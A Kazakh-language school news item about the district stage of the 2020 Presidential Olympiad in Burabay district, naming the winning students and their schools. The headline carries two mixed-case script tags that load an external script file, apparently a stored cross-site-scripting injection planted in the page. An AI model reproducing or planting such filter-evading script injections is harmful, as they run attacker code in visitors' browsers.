Президенттік олимпиаданың аудандық кезеңі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.09.2020

Президенттік олимпиаданың аудандық кезеңі 
Ағымдағы жылдың10 қыркүйегінде Бурабай ауданында жалпы білім беретін мектептер арасында «Президенттік олимпиаданың»  аудандық кезеңі қашықтан өтті. Олимпиадаға ауданымыздың жоғары деңгейлі мектептердің   11-сынып оқушылары қатысты. Оқушылар жаратылыстану-математика бағыты бойынша, яғни физика, математика, химия, биология пәндері бойынша өз білімдерін сынады. Аудандық кезең күрделі болғанымен, қатысушылар өз білімдерін, даярлығын жақсы деңгейде көрсете білді. Аудандық кезеңде жеңімпаз атанғандар: Прокопьева Виктория – 1 орын (№ 1 мектеп-гимназиясы), Төлегенова  Еркежан – 2 орын (№9 мектеп-гимназиясы),   Жакиенова   Сабина – 3 орын (№11 IT мектеп-лицейі) және Жусупов Ғалихан – 3орын  (№7 мектеп-лицейі).  
Осы аталған оқушылар «Президенттік олимпиада – 2020» облыстық кезеңіне өтті.  Жеңімпаздарға алдағы облыстық кезеңде сәттілік тілейміз!

Просмотров: 757


Пікір қосу



Деректерді қолтаңбаға қосу